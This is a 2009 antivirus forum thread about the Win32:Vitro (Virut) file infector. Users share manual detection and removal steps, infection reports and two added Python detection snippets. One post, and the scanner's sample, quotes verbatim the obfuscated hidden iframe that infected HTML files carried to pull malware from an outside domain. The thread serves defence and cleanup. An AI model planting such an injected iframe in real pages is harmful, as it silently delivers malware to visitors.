Author Topic: Malware name Win32:Vitro  (Read 340229 times)


polonus
Re: Malware name Win32:Vitro
« Reply #165 on: March 13, 2009, 01:37:52 PM »
Hi Tech,

For what you are trying to do, follow the instructions below; it is better for you not to mess with the firewall settings:
Step 1: Find the winlogon.exe process ID
Open up the task manager (right click on the task bar and select 'Task manager')
Enable the PID (process ID) column. By default, the task manager does not list the running process ID. If you don't have it:
In the program menu, select View->Select columns... A select columns dialog should appear.
Check the box next to PID and click on OK to apply the change.
Go to the process list (the Process tab in the task manager)
Look for winlogon.exe in the 'Image Name' column and record down its associated PID.
Step 2: Check to see if winlogon is establishing any suspicious connections. It should not be connecting to any external location.
Open up a command line window (Start->Run..., then execute 'cmd' to open a command line window).
List all the active net connections on your PC. In the command line window, type 'netstat -a -o'. This will list out all the active connections and the process that used them.
Look for the winlogon.exe process ID in the active connections list. If you see it, you're infected.

In some cases the infection can be connected to an IP address hosted at someplace.net (some domain). The 'fake' winlogon.exe is deployed in windows\winlogon.exe instead of windows\system32\winlogon.exe. The virus can't replace the original because it's a fundamental part of your O/S.

If you have the virus, here's how you clean it manually. Note, this is not for the faint-hearted (you are not, Tech!).
Step 1: Stop the fake winlogon.exe process from launching
Launch the registry editor (Start->Run, then execute 'regedit').
Go to My Computer\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
Look for the 'Shell' entry. The original entry should only say 'Explorer.exe'. If it says 'Explorer.exe c:\windows\winlogon.exe' or something to that effect, you need to change it back to just say 'Explorer.exe'.
Make a note of where the fake winlogon.exe is deployed to. We're going to erase the file in the next step.
Step 2: Boot in windows safe mode
Restart the operating system.
While it's booting, hold down F8. It should bring up the boot menu.
Select the Safe mode option and follow through on all the menus until the operating system launches.
If you're successful, the desktop should have the words 'safe mode' or something to that effect displayed.
Step 3: Delete the infection
Go to the offending file location. For me it was c:\windows\winlogon.exe. WARNING: DO NOT DELETE c:\windows\system32\winlogon.exe - this is the original O/S winlogon executable.
Delete the file. If you're not able to delete it, then the infection is active and you'll need to start from the beginning again.
Once it's deleted, reboot your machine as normal.
Step 4: Verify that the infection is clean by following the detection instructions.

I hope this will help you and all the others,

polonus (malware fighter)

Cybersecurity is more of an attitude than anything else. Avast Evangelists.

Use NoScript, a limited user account and a virtual machine and be safe(r)!
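Added example, not part of polonus's post: the two detection checks above (winlogon.exe showing up in 'netstat -a -o' with an external peer, and the Winlogon 'Shell' value carrying more than 'Explorer.exe') done over a constructed netstat dump and a constructed PID table, so the logic can be tried offline.

```python
# Constructed sample of 'netstat -a -o' output, as described in the post above;
# PID 620 stands in for winlogon.exe. Addresses are documentation ranges.
NETSTAT_SAMPLE = """
Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       1012
  TCP    192.168.1.5:1043       203.0.113.7:80         ESTABLISHED     1540
  TCP    192.168.1.5:1052       198.51.100.9:443       ESTABLISHED     620
  TCP    127.0.0.1:1025         127.0.0.1:1026         ESTABLISHED     620
  UDP    0.0.0.0:445            *:*                                    4
"""

# Constructed PID -> image name table, as read off Task Manager's PID column.
PID_TABLE = {4: "System", 620: "winlogon.exe", 1012: "svchost.exe", 1540: "firefox.exe"}

def parse_netstat(text):
    """Yield (proto, local, foreign, state, pid) for each socket row."""
    for line in text.splitlines():
        f = line.split()
        if len(f) < 4 or f[0] not in ("TCP", "UDP"):
            continue  # header, blank or malformed line
        state = f[3] if len(f) == 5 else ""  # UDP rows have no State column
        yield f[0], f[1], f[2], state, int(f[-1])

def external_connections(text, pid_table, image="winlogon.exe"):
    """Foreign endpoints that the process named `image` is talking to.

    Listening sockets, wildcard peers and loopback peers are skipped: the
    post's rule is that winlogon.exe should never reach an external host.
    """
    hits = []
    for proto, local, foreign, state, pid in parse_netstat(text):
        if pid_table.get(pid, "").lower() != image:
            continue
        host = foreign.rsplit(":", 1)[0]
        if state == "LISTENING" or host in ("0.0.0.0", "*") or host.startswith("127."):
            continue
        hits.append((proto, foreign, pid))
    return hits

def extra_shell_entries(value):
    """Whatever the Winlogon 'Shell' registry value names besides Explorer.exe.

    An empty list means the stock 'Explorer.exe'; anything else (for example
    'c:\\windows\\winlogon.exe') is the extra entry the post says to remove.
    """
    return [t for t in value.replace(",", " ").split() if t.lower() != "explorer.exe"]
```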

polonus
Re: Malware name Win32:Vitro
« Reply #166 on: March 13, 2009, 04:34:23 PM »
Hi malware fighters,

Got word from Giorgio Maone about the protection against the code on websites through NoScript installed on the Firefox or Flock browser. He writes:
Quote
unless the terminal domain installing the nefarious code is in your whitelist, you're protected by NoScript
So again NoScript fully protects the online user against going to this vector code,

polonus

Lisandro
Re: Malware name Win32:Vitro
« Reply #167 on: March 13, 2009, 06:05:03 PM »
Quote from: polonus
Hi malware fighters,

Got word from Giorgio Maone about the protection against the code on websites through NoScript installed on the Firefox or Flock browser. He writes:
Quote
unless the terminal domain installing the nefarious code is in your whitelist, you're protected by NoScript
So again NoScript fully protects the online user against going to this vector code,

polonus
Keep your list as short as you can ;)
The best things in life are free.

partzeus
Re: Malware name Win32:Vitro
« Reply #168 on: March 17, 2009, 11:51:12 PM »
Has anyone come up with a cure for this virus? Granted, I love the business, but I do not love the fact that I am destroying people's data to get them up and running again. When will a cure come out for this virus, please?

Lisandro
Re: Malware name Win32:Vitro
« Reply #169 on: March 18, 2009, 02:31:18 PM »
Quote from: partzeus
When will a cure come out for this virus please?
There isn't a cure for it... right now, only prevention: safe browsing and habits, update OS and antivirus. avast blocks a lot of their variants.

mojako_2you
Re: Malware name Win32:Vitro
« Reply #170 on: March 18, 2009, 02:44:51 PM »
Virut...

So hard to disinfect this virus...

But in my experience only one of my friends was infected by this virus...

Dunno where he got the virus...

But as far as I know this virus infects .exe package files....

I'm now taking high precautions by selecting read-only for my executable (.exe) files on my pendrive, as my files and installers were infected before from a member's laptop....

But I think I managed to remove this virus by just taking the files, excluding the .exe files, onto a pendrive... don't use a portable hard disk as it may go into System Volume Information....

Good luck....hehehehehe

I'm a noob only..

Insaniac
Re: Malware name Win32:Vitro
« Reply #171 on: March 24, 2009, 07:26:58 AM »
I had the same problem..
I tried AVG's and Norton's Virut removers with no luck, in addition to Malwarebytes and Dr. Web's CureIt. Nothing seemed to help, really.
I went with formatting and rebuilding from CDs, but I backed up everything after being infected. But it seemed to go nice. Then I opened adobe photoshop and avast blocked that jl.chura.pl again. I looked around at some html files connected to photoshop, and uploaded one of them to virustotal.com. Btw, the inserted iframe in all of my infected htmls and phps is a little different from what people have been writing around. It was the following:

<iframe src="http://jL.chu&#114;a.pl/rc/" style="display:none"></iframe>

Maybe it's because of those signs and numbers in the middle of the URL that Avast didn't detect it? Strangely enough, when I tried sending one infected file to my own email, gmail had already cleansed it (without actually saying so anywhere), and removed the iframe part. Come on, you Avast developing people, make Avast even better by updating it to kill this thing. I'm looking for infected exes in my infected backups.

Here are the results from virustotal for a certainly infected file including the above quoted iframe:
Engine            Version     Update      Result
AntiVir           7.9.0.120   2009.03.23  HTML/Infected.WebPage.Gen
CAT-QuickHeal     10.00       2009.03.24  HTML/Iframe.AYJ
McAfee-GW-Edition 6.7.6       2009.03.23  Heuristic.Script.Infected.WebPage
Sophos            4.39.0      2009.03.24  Troj/Fujif-Gen

All other AVs, including Avast and a couple of other McAfee versions, don't find anything. I tried full system scan with AntiVir, but it's useless since it simply deletes the html files instead of cleaning them. One may find the infected files with this but send them through gmail to get them cleansed.. Hehe, long process.

I'm trying this Sophos thing on my infected backups today, maybe that's the solution to this..
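Added example, not part of Insaniac's post: a small scanner that decodes HTML entities in attribute values before looking for hidden iframes, so an src written as jL.chu&#114;a.pl (the obfuscated form quoted above) is compared as jl.chura.pl instead of slipping past a raw-byte match. The sample page fragment is constructed.

```python
import html
import re

# Constructed sample: the entity-obfuscated hidden iframe quoted in the post,
# embedded in an otherwise harmless page, plus a visible iframe that must not match.
SAMPLE_HTML = """<html><body><h1>Photoshop help</h1>
<iframe src="http://jL.chu&#114;a.pl/rc/" style="display:none"></iframe>
<iframe src="https://example.invalid/video" width="400"></iframe>
<IFRAME SRC="http://example.invalid/x" WIDTH="0" HEIGHT="0"></IFRAME>
</body></html>"""

IFRAME_RE = re.compile(r"<iframe\b([^>]*)>", re.IGNORECASE)
ATTR_RE = re.compile(r'([a-zA-Z-]+)\s*=\s*"([^"]*)"')

def find_hidden_iframes(text):
    """Return (decoded_src, reason) for every iframe hidden from the user.

    Attribute values go through html.unescape first, so numeric entities
    such as &#114; ('r') no longer break a hostname match. An iframe counts
    as hidden when its style hides it or when it is sized to zero.
    """
    hits = []
    for m in IFRAME_RE.finditer(text):
        attrs = {k.lower(): html.unescape(v) for k, v in ATTR_RE.findall(m.group(1))}
        style = attrs.get("style", "").replace(" ", "").lower()
        if "display:none" in style or "visibility:hidden" in style:
            reason = "css-hidden"
        elif attrs.get("width") == "0" or attrs.get("height") == "0":
            reason = "zero-size"
        else:
            continue  # visible iframe, not the injection pattern
        hits.append((attrs.get("src", "").lower(), reason))
    return hits
```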

partzeus
Re: Malware name Win32:Vitro
« Reply #172 on: March 25, 2009, 01:34:14 AM »
What I find strange is the forum was crazy with posts a couple weeks ago and now nothing. I upgraded to Vista and now I am beta testing Windows 7 and no problems. Go figure. I wonder why there is no interest in cleaning this virus?

DavidR
Re: Malware name Win32:Vitro
« Reply #173 on: March 25, 2009, 01:47:11 AM »
It is not that there is a lack of interest in cleaning it but it uses two levels of encryption by all accounts and changes its form each time it infects another file, so it isn't a simple task.

I think the key has been to try and stop it get established.
Windows 10 Home 64bit/ Acer Aspire F15/ Intel Core i5 7200U 2.5GHz, 8GB DDR4 memory, 256GB SSD, 1TB HDD/ avast! free 24.2.6105 (build 24.2.8918.824) UI 1.0.799/ Firefox, uBlock Origin, uMatrix/ MailWasher Pro/ Avast! Mobile Security

dwarf0921
Re: Malware name Win32:Vitro
« Reply #174 on: March 25, 2009, 08:55:01 PM »
Quote from: partzeus
What I find strange is the forum was crazy with posts a couple weeks ago and now nothing. I upgraded to Vista and now I am beta testing Windows 7 and no problems. Go figure. I wonder why there is no interest in cleaning this virus?

Maybe Microsoft put the Virus out, and it doesn't affect the upcoming windows 7. So now everyone will be forced to upgrade to Windows 7. Dun Dun Dunnn....

On a more serious note, I too have gotten the virus (actually my Grandma's Computer) but I wanted to know if it is safe to back up MPEG and JPEG files from the computer. These are the only things I'm concerned about, because this computer has pictures and videos from my sister's wedding. I am asking about this because I have heard that it supposedly infects MP3 and WMV files.

polonus
Re: Malware name Win32:Vitro
« Reply #175 on: March 25, 2009, 10:41:37 PM »
Hi dwarf0921,

Well, the virus does not attack Vista etc. because there the attack vector is being stopped by another added security layer that we have/had not available in WinXP, but to accuse M$ of a sort of upgrade-forcing malware is just slanderous. I think if the malcreants got to know Vista like they know the workings of XP's Windows File Protection etc., they would not have hesitated to launch such a file infector as well.
And why should users on XP upgrade to Vista or Windows 7, when, "once bitten, twice shy", they may have chosen another non-vulnerable platform like Ubuntu etc.?
I think it is true that generally the Internet is under attack by parties that hold the view that the Internet should never have become public, but while we have it that would not be in M$'s interest,
....and where files and extensions are concerned, Win32:Vitro tries to infect all, but does not do a very good job of that, and being buggy there makes removal even worse than a nightmare,

polonus
« Last Edit: March 25, 2009, 10:47:12 PM by polonus »

Blalok
Re: Malware name Win32:Vitro
« Reply #176 on: April 02, 2009, 08:58:20 PM »
Actually I have been attacked on Windows Vista. My GData Virus Scan did not find anything checking the downloaded file (it scans every file I want to download first, and then it gets actually downloaded by my FF3 in an instant). I'm not sure whether the virus broke out before being checked by GData (as every scan requires a download), or if GData just didn't find it. Anyway the scan afterwards revealed ~130 infected .exe files, containing e.g. explorer.exe, taskmgr.exe and some other essential files. That's when I changed to Safe Mode (too late). I cannot open Task Manager (the tray icon appears but I can't actually open it), Control Panel is blocked. Even cmd does not work as the commands seem to be infected as well.

CureIt did not find anything (I used it in the way Polonus described it on page 4 of this thread).

Boot discs don't work, because I have my system completely encrypted with TrueCrypt. I did not dare to decrypt it yet. If you want me to I could do it, as I am changing back to Ubuntu for sure (I tested Vista just because it came with my laptop). So I'm quite happy I had my sensitive data on another encrypted external volume which wasn't connected during or after the infection. I would be happy to be able to rescue some PDFs, RARs, DOCs and MPGs (pictures). Oh yeah, and some videos (MPEG and AVI). In two RAR archives I have some MP3s (about 20 files). Burned all that on a DVD. How do you rate the chance that I can use them securely? How shall I proceed?

As I mentioned before I can give you more information as I have nothing important to lose. But you have to consider that I do not know much more than the basics for efficient use of OSs, not more. So if you want me to do something then give me instructions people not fighting everyday with tcpip protocols can understand.

Thanks :)


polonus
Re: Malware name Win32:Vitro
« Reply #177 on: April 02, 2009, 09:40:13 PM »
Hi Blalok,

That is strange, that the virus got you on an OS that is known not to be vulnerable through the special added File Protection etc. of Vista, but it might be the very encryption you used for protection that became your undoing.
Nothing left to repair there, I think, with more than a gross of infected executables; just follow the ffr method, that is fdisk, format and re-install, or if you switch over to another distro, a total recall of the machine at hand. Also make sure that you change all your passwords, log-in accounts etc., as this machine was severely compromised, and enjoy life after Windows. Not much you can do, really, now. Thanks for your report,

polonus (malware fighter)



« Last Edit: April 02, 2009, 09:42:06 PM by polonus »

Arch Angel
Re: Malware name Win32:Vitro
« Reply #178 on: April 03, 2009, 09:18:26 AM »
Polonus, thanks for the tips and the interesting but over-my-head reading.

Will it be safe to move HTM files from the original machine's HD?
And is the act of copying and moving enough to trigger an infection to spread?
All I want to copy are .doc, .mp3, and .htm files.  The .htm files are negotiable.

Finally, I would like to know how I can tell if the USB drive is infected. I've got to stick it in SOMETHING to reformat it.
Any hints?

Hi

Got the virus from a client's PC while transferring files to my server so I could format the HDD and insert another 500 GB HDD.
Main thing was that when I transferred a program to my laptop via LAN and ran it, things went crazy.

Laptop was redone more than 7 times and it's gone. Why so many re-dos? lol
(Each time I used some of the backups on the server.) Oops!

The last time I redid the laptop I saw in posts to not use ANY FILES FROM ANY BACKUP UNLESS SCANNED.
So I scanned and transferred via memory stick.

NOW........ Last night I copied some other files, first scanning them with my FAV antivirus (AVAST!) hehehe
Copied to mem stick, moved it to my laptop... no problems.
Later I scanned a small folder with HTML files in it and no virus; I moved them to my laptop and opened the HTML file.
WHAT A MISTAKE!!!!

The first thing Avast picked up was "Sign Of "Win32:Trojan-Gen{Other} has been found in *path*
I deleted it - then all went pear-shaped ....

Sign of "Win32:Vitro has been found c:\windows\systemm32\NOTEPAD.EXE"

Then accwiz.exe etc. etc....... arrrrrrgghhhh
I wanted to fly down and strangle the clever idiot who wrote this thing.

My laptop (the one I'm using now) is infected.
No files are being murdered at this stage because of the setting that allows or denies write access to the files the system uses - so for now I am safe in that it's not spreading.

I opened the code in the HTML file I opened and there it was, an iframe with code next to it - BASTARD
PLEASE DO NOT COPY HTML FILES FROM ANY BACKUP. IT CONTAINS THE CODE TO IMPLEMENT THE VIRUS ON YOUR SYSTEM!

Sigh.... so I guess I am redoing my machine ...AGAIN today -

HINT FOR ANY DEVELOPERS OUT THERE: I am really thinking a "Virtual Machine" is my next option because .NET 2008 and SQL 2008 take hours to install
 ;D

Cheers
Need_O2
Re: Malware name Win32:Vitro
« Reply #179 on: April 06, 2009, 02:04:28 PM »
That thing got me too.
Weirdly, avast finds all the exes that are infected but can't find what is infecting them.
Anyway, I was moving them to quarantine, including LogonUI32.exe, then poof, Windows never opened again.
(yes I checked all hard drives in boot scan mode)
result: format